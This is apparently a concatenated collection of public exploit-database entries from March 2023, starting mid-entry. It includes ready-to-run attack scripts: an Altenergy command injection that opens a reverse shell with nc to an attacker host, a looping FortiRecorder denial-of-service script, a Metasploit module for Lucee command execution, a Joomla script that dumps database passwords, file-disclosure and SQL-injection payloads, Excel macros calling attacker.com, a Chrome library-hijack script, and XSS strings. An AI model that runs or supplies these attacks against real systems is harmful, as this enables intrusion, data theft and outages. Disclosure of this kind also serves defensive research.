hdo6K2FNIZn%2F9k%3D&filename=hello.php #we visit the image http://localhost/uploads/users/tmp/hello.php

# Exploit Title: Snitz Forum v1.0 - Blind SQL Injection # Date: 13/03/2023 # Exploit Author: Emiliano Febbi # Vendor Homepage: https://forum.snitz.com/ # Software Link: https://sourceforge.net/projects/sf2k/files/ # Version: ALL VERSION # Tested on: Windows 10 [code] ._ _______. */ ///______I ) . /_(_) /__/ *0day PoC* http://www.site.com/forum/cal.asp?date=25/03/2023 <= SQLi ??? http://www.site.com/forum/log.asp?log_id=3456 <= Blind SQLi #!WORK!# ._________. */ ///______I ) . /_(_) /__/*0day PoC End* [/code]

# Exploit Title: Wondershare Dr Fone 12.9.6 - Privilege Escalation # Date: 14 March 2023 # Exploit Author: Thurein Soe # Vendor Homepage: https://drfone.wondershare.com # Software Link: https://mega.nz/file/ZFd1TZIR#e2WfCX_ryaH08C3VNGZH1yAIG6DU01p-M_rDooq529I # Version: Dr Fone version 12.9.6 # Tested on: Window 10 (10.0.19045.2604) # CVE : CVE-2023-27010 *Vulnerability description*: Wondershare Dr Fone version 12.9.6 running services named "WsDrvInst" on Windows have weak service permissions and are susceptible to local privilege escalation vulnerability. Weak service permissions run with system user permission, allowing a standard user/domain user to elevate to administrator privilege upon successfully modifying the service or replacing the affected executable. DriverInstall.exe gave modification permission to any authenticated users in the windows operating system, allowing standard users to modify the service and leading to Privilege Escalation. C:\Users\NyaMeeEain\Desktop>cacls "C:\Program Files (x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe" C:\Program Files (x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe Everyone:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Users:(ID)R APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R C:\Users\NyaMeeEain\Desktop>sc qc WsDrvInst SERVICE_NAME: WsDrvInst TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Driver Install Service DEPENDENCIES : RPCSS SERVICE_START_NAME : LocalSystem

# Exploit Title: Altenergy Power Control Software C1.2.5 - OS command injection # Google Dork: intitle:"Altenergy Power Control Software" # Date: 15/3/2023 # Exploit Author: Ahmed Alroky # Vendor Homepage: https://apsystems.com/ # Version: C1.2.5 # Tested on: Windows 10 # CVE : CVE-2023-28343 import requests import argparse def exploit(target,attacker,port): url = f'{target}/index.php/management/set_timezone' headers = { 'Accept': 'application/json, text/javascript, */*; q=0.01', 'X-Requested-With': 'XMLHttpRequest', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Origin': f'{target}', 'Referer': f'{target}/index.php/management/datetime', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9', 'Connection': 'close' } print(f"Sending Request") data = { 'timezone': f'`mknod /tmp/pipe p;/bin/sh 0</tmp/pipe | nc {attacker} {port} 1>/tmp/pipe`' } response = requests.post(url, headers=headers, data=data) # print(response.text) if __name__ == "__main__": parser = argparse.ArgumentParser(description='Parse target, attacker, and port.',) parser.add_argument('--target','-t', type=str, help='The target IP address or hostname. example : http://192.168.254') parser.add_argument('--attacker','-a', type=str, help='The attacker IP address or hostname.') parser.add_argument('--port', '-p',type=int, help='Listening port') args = parser.parse_args() try: exploit(args.target,args.attacker,args.port) except: parser.print_help() print("Exploit done")

# Exploit Title: FortiRecorder 6.4.3 - Denial of Service # Google Dork: N/A # Date: 13/03/2023 # Exploit Author: Mohammed Adel # Vendor Homepage: https://www.fortinet.com/ # Software Link: https://www.fortinet.com/products/network-based-video-security/forticam-fortirecorder # Version: 6.4.3 and below && 6.0.11 to 6.0.0 # Tested on: Kali Linux # CVE : CVE-2022-41333 # Security Advisory: https://www.fortiguard.com/psirt/FG-IR-22-388 # Technical Analysis: https://medium.com/@0xpolar/cve-2022-41333-71eb289d60b5 import requests import warnings import sys from urllib.parse import unquote warnings.filterwarnings('ignore', message='Unverified HTTPS request') def POST(target, req_type, payload): print("[+] Target : "+target) print("[+] Request Type: POST") print("[+] Payload : " +payload) post_url = target+"/module/admin.fe" post_headers = {"User-Agent": "CVE-2022-41333", "Content-Type": "application/x-www-form-urlencoded"} url_decoder = unquote(payload) full_payload = "fewReq="+url_decoder while True: r = requests.post(post_url, headers=post_headers, data=full_payload, verify=False) if "Failed: Access denied" in r.text: print("[+] Payload Sent.") else: print("[!] Something went wrong!") print(r.text) def GET(target, req_type, payload): print("[+] Target : "+target) print("[+] Request Type: GET") print("[+] Payload : " +payload) while True: url = target+"/module/admin.fe?fewReq="+payload headers = {"User-Agent": "CVE-2022-41333", "Connection": "close"} r = requests.get(url, headers=headers, verify=False) if "Failed: Access denied" in r.text: print("[+] Payload Sent.") else: print("[!] Something went wrong!") print(r.text) print("[+] Starting ..") target = str((sys.argv[1])) # https://fortirecorder.fortidemo.com req_type = str((sys.argv[2])) # POST or GET payload = str((sys.argv[3])) # :B:JSsrJW16blB9dXp8ayJMZmxcfnJee3J2cTltem5efGt2cHEiLio5amx6bXF+cnoi if "post" in req_type.lower(): if "https" in target.lower() or "http" in target.lower(): POST(target, req_type, payload) else: print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]") elif "get" in req_type.lower(): if "https" in target.lower() or "http" in target.lower(): GET(target, req_type, payload) else: print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]") else: print("[!] Invalid Request Type.")

# Title: Adobe Connect 11.4.5 - Local File Disclosure # Author: h4shur # date:2021.01.16-2023.02.17 # CVE: CVE-2023-22232 # Vendor Homepage: https://www.adobe.com # Software Link: https://www.adobe.com/products/adobeconnect.html # Version: 11.4.5 and earlier, 12.1.5 and earlier # User interaction: None # Tested on: Windows 10 & Google Chrome, kali linux & firefox ### Summary: Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. Exploitation of this issue does not require user interaction. ### Description : There are many web applications in the world, each of which has vulnerabilities due to developer errors, and this is a problem for all of them, and even the best of them, like the "adobe connect" program, have vulnerabilities that occur every month. They are found and fixed by the team. * What is LFD bug? LFD bug stands for Local File Disclosure / Download, which generally allows the attacker to read and download files within the server, so it can be considered a very dangerous bug in the web world and programmers must be aware of it. Be careful and maintain security against this bug * Intruder access level with LFD bug The level of access using this bug can be even increased to the level of access to the website database in such a way that the hacker reads sensitive files inside the server that contain database entry information and enters the database and by extracting the information The admin will have a high level of access * Identify vulnerable sites To search for LFD bugs, you should check the site inputs. If there is no problem with receiving ./ characters, you can do the test to read the files inside the server if they are vulnerable. Enter it and see if it is read or not, or you can use files inside the server such as / etc / passwd / .. and step by step using ../ to return to the previous path to find the passwd file * And this time the "lfd" in "adobe connect" bug: To download and exploit files, you must type the file path in the "download-url" variable and the file name and extension in the "name" variable. You can download the file by writing the file path and file name and extension. When you have written the file path, file name and extension in the site address variables, a download page from Adobe Connect will open for you, with "Save to My Computer file name]" written in the download box and a file download link at the bottom of the download box, so you can download the file. * There are values inside the url that do not allow a file other than this file to be downloaded. * Values: sco_id and tickets But if these values are cleared, you will see that reloading is possible without any obstacles At another address, you can download multiple files as a zip file. We put the address of the files in front of the variable "ffn" and if we want to add the file, we add the variable "ffn" again and put the address of the file in front of it. The "download_type" variable is also used to specify the zip extension. ### POC : https://target.com/[folder]/download?download-url=[URL]&name=[file.type] https://target.com/[folder]/download?output=output&download_type=[Suffix]&ffn=[URL]&baseContentUrl=[base file folder] ### References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22232 https://nvd.nist.gov/vuln/detail/CVE-2023-22232 https://helpx.adobe.com/security/products/connect/apsb23-05.html

## Exploit Title: Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE) ## Exploit Author: nu11secur1ty ## Date: 03.16.2023 ## Vendor: https://www.microsoft.com/en-us/microsoft-365/excel ## Software: https://www.microsoft.com/en-us/microsoft-365/excel ## Reference: https://www.invicti.com/learn/remote-code-execution-rce/ ## CVE ID: CVE-2023-23399 ## Description: The malicious user can exploit the victim's PC remotely. For example, when the score indicates that the Attack Vector is Local and User Interaction is Required, this could describe an exploit in which an attacker, through social engineering, convinces a victim to download and open a specially crafted file from a website which leads to a local attack on their computer. STATUS: HIGH Vulnerability [+]Exploit0: ``` Sub Check_your_salaries() CreateObject("Shell.Application").ShellExecute "microsoft-edge:https://attacker.com" End Sub ``` [+]Exploit1: ``` Sub cmd() Dim Program As String Dim TaskID As Double On Error Resume Next Program = "cmd.exe" TaskID = Shell(Program, 1) If Err <> 0 Then MsgBox "Can't start " & Program End If End Sub ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23399) ## Proof and Exploit: [href](https://streamable.com/dnyfx0) ## Time spend: 03:00:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

#!/usr/bin/env python3 # Exploit Title: Icinga Web 2.10 - Arbitrary File Disclosure # Date: 2023-03-19 # Exploit Author: Jacob Ebben # Vendor Homepage: https://icinga.com/ # Software Link: https://github.com/Icinga/icingaweb2 # Version: <2.8.6, <2.9.6, <2.10 # Tested on: Icinga Web 2 Version 2.9.2 on Linux # CVE: CVE-2022-24716 # Based on: https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/ import argparse import requests from termcolor import colored def print_message(message, type): if type == 'SUCCESS': print('[' + colored('SUCCESS', 'green') + '] ' + message) elif type == 'INFO': print('[' + colored('INFO', 'blue') + '] ' + message) elif type == 'WARNING': print('[' + colored('WARNING', 'yellow') + '] ' + message) elif type == 'ALERT': print('[' + colored('ALERT', 'yellow') + '] ' + message) elif type == 'ERROR': print('[' + colored('ERROR', 'red') + '] ' + message) def get_normalized_url(url): if url[-1] != '/': url += '/' if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://': url = "http://" + url return url def get_proxy_protocol(url): if url[0:8].lower() == 'https://': return 'https' return 'http' parser = argparse.ArgumentParser(description='Arbitrary File Disclosure Vulnerability in Icinga Web <2.8.6, <2.9.6, <2.10') parser.add_argument('TARGET', type=str, help='Target Icinga location (Example: http://localhost:8080/icinga2/ or https://victim.xyz/icinga/)') parser.add_argument('FILE', type=str, help='Filename to gather from exploit (Example: "/etc/passwd" or "/etc/icingaweb2/config.ini")') parser.add_argument('-P','--proxy', type=str, help='HTTP proxy address (Example: http://127.0.0.1:8080/)') args = parser.parse_args() if args.proxy: proxy_url = get_normalized_url(args.proxy) proxy_protocol = get_proxy_protocol(proxy_url) proxies = { proxy_protocol: proxy_url } else: proxies = {} base_url = get_normalized_url(args.TARGET) exploit_url = base_url + "lib/icinga/icinga-php-thirdparty" + args.FILE request = requests.get(base_url, proxies=proxies) if request.status_code == 404: print_message("Could not connect to provided URL!", "ERROR") exit() request = requests.get(exploit_url, proxies=proxies) file_content = request.text print(file_content)

# Exploit Title: Restaurant Management System 1.0 - SQL Injection # Date: 2023-03-20 # Exploit Author: calfcrusher ([email protected]) # Vendor Homepage: https://www.sourcecodester.com/users/lewa # Software Link: https://www.sourcecodester.com/php/11815/restaurant-management-system.html # Version: 1.0 # Tested on: Apache 2.4.6, PHP 5.4.16 Endpoint: /rms/delete-order.php Vulnerable parameter: id (GET) Time Base SQL Injection payloads http://example.com/rms/delete-order.php?id=1'or+sleep(5)%3b%23 http://example.com/rms/delete-order.php?id=122'+and+(select+1+from+(select(sleep(3)))calf)--

#Exploit Title: Google Chrome 109.0.5414.74 - Code Execution via missing lib file (Ubuntu) Product: Google Chrome Discovered by: Rafay Baloch and Muhammad Samak #Version: 109.0.5414.74 #Impact: Moderate #Company: Cyber Citadel #Website: https://www.cybercitadel.com #Tested-on : Ubuntu 22.04.1 *Description* Google chrome attempts to load the 'libssckbi.so' file from a user-writable location. PATH: /home/$username/.pki/nssdb/libnssckbi.so Since the Shared Library 'ibnssckbi.so' specified path is writeable. It is possible to achieve the Code Execution by placing the malicious file with the name `libnssckbi.so` in the specified path. *exploit* Following is the POC that could be used to reproduce the issue: echo "\n\t\t\tGoogle-Chrome Shared Library Code Execution..." echo "[*] Checking /.pki/nssdb PATH" if [ -d "/home/haalim/.pki/nssdb" ] then echo "[+] Directory Exists..." if [ -w "/home/haalim/.pki/nssdb" ] then echo "[+] Directory is writable..." echo "[+] Directory is writable..." echo "[+] Generating malicious File libnssckbi.so ..." echo "#define _GNU_SOURCE" > /home/haalim/.pki/nssdb/exploit.c echo "#include <unistd.h>" >> /home/haalim/.pki/nssdb/exploit.c echo "#include <stdio.h>" >> /home/haalim/.pki/nssdb/exploit.c echo "#include <stdlib.h>" >> /home/haalim/.pki/nssdb/exploit.c echo "void f() {" >> /home/haalim/.pki/nssdb/exploit.c echo 'printf("Code Executed............ TMGM :)\n");' >> /home/haalim/.pki/nssdb/exploit.c echo "}" >> /home/haalim/.pki/nssdb/exploit.c gcc -c -Wall -Werror -fpic /home/haalim/.pki/nssdb/exploit.c -o /home/haalim/.pki/nssdb/exploit.o gcc -shared -o /home/haalim/.pki/nssdb/libnssckbi.so -Wl,-init,f /home/haalim/.pki/nssdb/exploit.o fi fi Upon closing the browser windows, the application executes the malicious code *Impact* The attacker can use this behavior to bypass the application whitelisting rules. This behavior can also lead to DoS attacks. An attacker can trick a victim into supplying credentials by creating a fake prompt.

# Exploit Title: ActFax 10.10 - Unquoted Path Services # Date: 22/03/2023 # Exploit Author: Birkan ALHAN (@taftss) # Vendor Homepage: https://www.actfax.com # Software Link: https://www.actfax.com/en/download.html # Version: Version 10.10, Build 0551 (2023-02-01) # Tested on: Windows 10 21H2 OS Build 19044.2728 #Discover to Unquoted Services Path: C:\Users\taftss>sc qc ActiveFaxServiceNT [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ActiveFaxServiceNT TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\ActiveFax\Server\ActSrvNT.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ActiveFax-Server-Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\taftss>systeminfo Host Name: RedsTaftss OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19044 N/A Build 19044 #Another Discover Methot to Unquoted Services Path: wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ #Exploit: If the attacker has taken over the system and the taken user has write privileges to the "C:\Program Files\ActiveFax" folder or "C:\", they can inject their own malicious "ActSrvNT.exe" file. Then the ActiveFaxServiceNT Service can be restarted to privilege escalation. -- *Birkan ALHAN*

# Exploit Title: Lucee Scheduled Job v1.0 - Command Execution # Date: 3-23-2012 # Exploit Author: Alexander Philiotis # Vendor Homepage: https://www.lucee.org/ # Software Link: https://download.lucee.org/ # Version: All versions with scheduled jobs enabled # Tested on: Linux - Debian, Lubuntu & Windows 10 # Ref : https://www.synercomm.com/blog/scheduled-tasks-with-lucee-abusing-built-in-functionality-for-command-execution/ ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Retry include Msf::Exploit::FileDropper require 'base64' def initialize(info = {}) super( update_info( info, 'Name' => 'Lucee Authenticated Scheduled Job Code Execution', 'Description' => %q{ This module can be used to execute a payload on Lucee servers that have an exposed administrative web interface. It's possible for an administrator to create a scheduled job that queries a remote ColdFusion file, which is then downloaded and executed when accessed. The payload is uploaded as a cfm file when queried by the target server. When executed, the payload will run as the user specified during the Lucee installation. On Windows, this is a service account; on Linux, it is either the root user or lucee. }, 'Targets' => [ [ 'Windows Command', { 'Platform' => 'win', 'Arch' => ARCH_CMD, 'Type' => :windows_cmd } ], [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd } ] ], 'Author' => 'Alexander Philiotis', # [email protected] 'License' => MSF_LICENSE, 'References' => [ # This abuses the functionality inherent to the Lucee platform and # thus is not related to any CVEs. # Lucee Docs ['URL', 'https://docs.lucee.org/'], # cfexecute & cfscript documentation ['URL', 'https://docs.lucee.org/reference/tags/execute.html'], ['URL', 'https://docs.lucee.org/reference/tags/script.html'], ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ # /opt/lucee/server/lucee-server/context/logs/application.log # /opt/lucee/web/logs/exception.log IOC_IN_LOGS, ARTIFACTS_ON_DISK, # ColdFusion files located at the webroot of the Lucee server # C:/lucee/tomcat/webapps/ROOT/ by default on Windows # /opt/lucee/tomcat/webapps/ROOT/ by default on Linux ] }, 'Stance' => Msf::Exploit::Stance::Aggressive, 'DisclosureDate' => '2023-02-10' ) ) register_options( [ Opt::RPORT(8888), OptString.new('PASSWORD', [false, 'The password for the administrative interface']), OptString.new('TARGETURI', [true, 'The path to the admin interface.', '/lucee/admin/web.cfm']), OptInt.new('PAYLOAD_DEPLOY_TIMEOUT', [false, 'Time in seconds to wait for access to the payload', 20]), ] ) deregister_options('URIPATH') end def exploit payload_base = rand_text_alphanumeric(8..16) authenticate start_service({ 'Uri' => { 'Proc' => proc do |cli, req| print_status("Payload request received for #{req.uri} from #{cli.peerhost}") send_response(cli, cfm_stub) end, 'Path' => '/' + payload_base + '.cfm' } }) # # Create the scheduled job # create_job(payload_base) # # Execute the scheduled job and attempt to send a GET request to it. # execute_job(payload_base) print_good('Exploit completed.') # # Removes the scheduled job # print_status('Removing scheduled job ' + payload_base) cleanup_request = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'vars_get' => { 'action' => 'services.schedule' }, 'vars_post' => { 'row_1' => '1', 'name_1' => payload_base.to_s, 'mainAction' => 'delete' } }) if cleanup_request && cleanup_request.code == 302 print_good('Scheduled job removed.') else print_bad('Failed to remove scheduled job.') end end def authenticate auth = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => true, 'vars_post' => { 'login_passwordweb' => datastore['PASSWORD'], 'lang' => 'en', 'rememberMe' => 's', 'submit' => 'submit' } }) unless auth fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end unless auth.code == 200 && auth.body.include?('nav_Security') fail_with(Failure::NoAccess, 'Unable to authenticate. Please double check your credentials and try again.') end print_good('Authenticated successfully') end def create_job(payload_base) create_job = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => true, 'vars_get' => { 'action' => 'services.schedule', 'action2' => 'create' }, 'vars_post' => { 'name' => payload_base, 'url' => get_uri.to_s, 'interval' => '3600', 'start_day' => '01', 'start_month' => '02', 'start_year' => '2023', 'start_hour' => '00', 'start_minute' => '00', 'start_second' => '00', 'run' => 'create' } }) fail_with(Failure::Unreachable, 'Could not connect to the web service') if create_job.nil? fail_with(Failure::UnexpectedReply, 'Unable to create job') unless create_job.code == 302 print_good('Job ' + payload_base + ' created successfully') job_file_path = file_path = webroot fail_with(Failure::UnexpectedReply, 'Could not identify the web root') if job_file_path.blank? case target['Type'] when :unix_cmd file_path << '/' job_file_path = "#{job_file_path.gsub('/', '//')}//" when :windows_cmd file_path << '\\' job_file_path = "#{job_file_path.gsub('\\', '\\\\')}\\" end update_job = send_request_cgi({ 'method' => 'POST', 'uri' => target_uri.path, 'keep_cookies' => true, 'vars_get' => { 'action' => 'services.schedule', 'action2' => 'edit', 'task' => create_job.headers['location'].split('=')[-1] }, 'vars_post' => { 'name' => payload_base, 'url' => get_uri.to_s, 'port' => datastore['SRVPORT'], 'timeout' => '50', 'username' => '', 'password' => '', 'proxyserver' => '', 'proxyport' => '', 'proxyuser' => '', 'proxypassword' => '', 'publish' => 'true', 'file' => "#{job_file_path}#{payload_base}.cfm", 'start_day' => '01', 'start_month' => '02', 'start_year' => '2023', 'start_hour' => '00', 'start_minute' => '00', 'start_second' => '00', 'end_day' => '', 'end_month' => '', 'end_year' => '', 'end_hour' => '', 'end_minute' => '', 'end_second' => '', 'interval_hour' => '1', 'interval_minute' => '0', 'interval_second' => '0', 'run' => 'update' } }) fail_with(Failure::Unreachable, 'Could not connect to the web service') if update_job.nil? fail_with(Failure::UnexpectedReply, 'Unable to update job') unless update_job.code == 302 || update_job.code == 200 register_files_for_cleanup("#{file_path}#{payload_base}.cfm") print_good('Job ' + payload_base + ' updated successfully') end def execute_job(payload_base) print_status("Executing scheduled job: #{payload_base}") job_execution = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'vars_get' => { 'action' => 'services.schedule' }, 'vars_post' => { 'row_1' => '1', 'name_1' => payload_base, 'mainAction' => 'execute' } }) fail_with(Failure::Unreachable, 'Could not connect to the web service') if job_execution.nil? fail_with(Failure::Unknown, 'Unable to execute job') unless job_execution.code == 302 || job_execution.code == 200 print_good('Job ' + payload_base + ' executed successfully') payload_response = nil retry_until_truthy(timeout: datastore['PAYLOAD_DEPLOY_TIMEOUT']) do print_status('Attempting to access payload...') payload_response = send_request_cgi( 'uri' => '/' + payload_base + '.cfm', 'method' => 'GET' ) payload_response.nil? || (payload_response && payload_response.code == 200 && payload_response.body.exclude?('Error')) || (payload_response.code == 500) end # Unix systems tend to return a 500 response code when executing a shell. Windows tends to return a nil response, hence the check for both. fail_with(Failure::Unknown, 'Unable to execute payload') unless payload_response.nil? || payload_response.code == 200 || payload_response.code == 500 if payload_response.nil? print_status('No response from ' + payload_base + '.cfm' + (session_created? ? '' : ' Check your listener!')) elsif payload_response.code == 200 print_good('Received 200 response from ' + payload_base + '.cfm') output = payload_response.body.strip if output.include?("\n") print_good('Output:') print_line(output) elsif output.present? print_good('Output: ' + output) end elsif payload_response.code == 500 print_status('Received 500 response from ' + payload_base + '.cfm' + (session_created? ? '' : ' Check your listener!')) end end def webroot res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) }) return nil unless res res.get_html_document.at('[text()*="Webroot"]')&.next&.next&.text end def cfm_stub case target['Type'] when :windows_cmd <<~CFM.gsub(/^\s+/, '').tr("\n", '') <cfscript> cfexecute(name="cmd.exe", arguments="/c " & toString(binaryDecode("#{Base64.strict_encode64(payload.encoded)}", "base64")),timeout=5); </cfscript> CFM when :unix_cmd <<~CFM.gsub(/^\s+/, '').tr("\n", '') <cfscript> cfexecute(name="/bin/bash", arguments=["-c", toString(binaryDecode("#{Base64.strict_encode64(payload.encoded)}", "base64"))],timeout=5); </cfscript> CFM end end end

#!/usr/bin/env ruby # Exploit ## Title: Joomla! v4.2.8 - Unauthenticated information disclosure ## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr) ## Author website: https://pwn.by/noraj/ ## Exploit source: https://github.com/Acceis/exploit-CVE-2023-23752 ## Date: 2023-03-24 ## Vendor Homepage: https://www.joomla.org/ ## Software Link: https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.tar.gz?format=gz ## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7) ## Tested on: Joomla! Version 4.2.7 ## CVE : CVE-2023-23752 ## References: ## - https://nsfocusglobal.com/joomla-unauthorized-access-vulnerability-cve-2023-23752-notice/ ## - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html ## - https://attackerkb.com/topics/18qrh3PXIX/cve-2023-23752 ## - https://nvd.nist.gov/vuln/detail/CVE-2023-23752 ## - https://vulncheck.com/blog/joomla-for-rce ## - https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-23752.yaml # standard library require 'json' # gems require 'httpx' require 'docopt' require 'paint' doc = <<~DOCOPT #{Paint['Joomla! < 4.2.8 - Unauthenticated information disclosure', :bold]} #{Paint['Usage:', :red]} #{__FILE__} <url> [options] #{__FILE__} -h | --help #{Paint['Parameters:', :red]} <url> Root URL (base path) including HTTP scheme, port and root folder #{Paint['Options:', :red]} --debug Display arguments --no-color Disable colorized output (NO_COLOR environment variable is respected too) -h, --help Show this screen #{Paint['Examples:', :red]} #{__FILE__} http://127.0.0.1:4242 #{__FILE__} https://example.org/subdir #{Paint['Project:', :red]} #{Paint['author', :underline]} (https://pwn.by/noraj / https://twitter.com/noraj_rawsec) #{Paint['company', :underline]} (https://www.acceis.fr / https://twitter.com/acceis) #{Paint['source', :underline]} (https://github.com/Acceis/exploit-CVE-2023-23752) DOCOPT def fetch_users(root_url, http) vuln_url = "#{root_url}/api/index.php/v1/users?public=true" http.get(vuln_url) end def parse_users(root_url, http) data_json = fetch_users(root_url, http) data = JSON.parse(data_json)['data'] users = [] data.each do |user| if user['type'] == 'users' id = user['attributes']['id'] name = user['attributes']['name'] username = user['attributes']['username'] email = user['attributes']['email'] groups = user['attributes']['group_names'] users << {id: id, name: name, username: username, email: email, groups: groups} end end users end def display_users(root_url, http) users = parse_users(root_url, http) puts Paint['Users', :red, :bold] users.each do |u| puts "[#{u[:id]}] #{u[:name]} (#{Paint[u[:username], :yellow]}) - #{u[:email]} - #{u[:groups]}" end end def fetch_config(root_url, http) vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true" http.get(vuln_url) end def parse_config(root_url, http) data_json = fetch_config(root_url, http) data = JSON.parse(data_json)['data'] config = {} data.each do |entry| if entry['type'] == 'application' key = entry['attributes'].keys.first config[key] = entry['attributes'][key] end end config end def display_config(root_url, http) c = parse_config(root_url, http) puts Paint['Site info', :red, :bold] puts "Site name: #{c['sitename']}" puts "Editor: #{c['editor']}" puts "Captcha: #{c['captcha']}" puts "Access: #{c['access']}" puts "Debug status: #{c['debug']}" puts puts Paint['Database info', :red, :bold] puts "DB type: #{c['dbtype']}" puts "DB host: #{c['host']}" puts "DB user: #{Paint[c['user'], :yellow, :bold]}" puts "DB password: #{Paint[c['password'], :yellow, :bold]}" puts "DB name: #{c['db']}" puts "DB prefix: #{c['dbprefix']}" puts "DB encryption #{c['dbencryption']}" end begin args = Docopt.docopt(doc) Paint.mode = 0 if args['--no-color'] puts args if args['--debug'] http = HTTPX display_users(args['<url>'], http) puts display_config(args['<url>'], http) rescue Docopt::Exit => e puts e.message end

Exploit Title: ENTAB ERP 1.0 - Username PII leak Date: 17.05.2022 Exploit Author: Deb Prasad Banerjee Vendor Homepage: https://www.entab.in Version: Entab ERP 1.0 Tested on: Windows IIS CVE: CVE-2022-30076 Vulnerability Name: Broken Access control via Rate Limits Description: In the entab software in fapscampuscare.in, there is a login portal with a UserId field. An authenticated user would enter and get their name as well as other services. However, there should be a rate limit in place, which is not present. As a result, a hacker could bypass the system and obtain other usernames via broken access control. This enables a threat actor to obain the complete full name and user ID of the person. POC: 1. Go to fapscampuscare.in or any entab hosted software and find the entab software. 2. Use a proxy to intercept the request. 3. Since it's a student login, try a random UserId (e.g., s11111). 4. Intercept the request using Burp Suite and send it to the Intruder. 5. Select payloads from number 100000-20000, and turn off URL encoding on the UserId parameter. 6. Start the attack and sort by length to obtain the username and full name of other users.

# Exploit Title: Online Appointment System V1.0 - Cross-Site Scripting (XSS) # Date: 25/02/2023 # Exploit Author: Sanjay Singh # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14502/online-appointment-system-php-full-source-code-2020.html # Tested on: Windows use payload="><script>alert(XSS)</script> 1. visit-http://localhost/doctor/applicationlayer/Doctorpatient.php 2. login Doctor account with default credential 3. Click left side add description 4. capture request and put payload http://localhost/doctor/presentaionlayer/doctor/add.php/wrycv%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E request GET /doctor/presentaionlayer/doctor/add.php/wrycv%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E HTTP/1.1 Host: localhost Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=ocj11iinu8pn536i3cdia0faql Connection: close

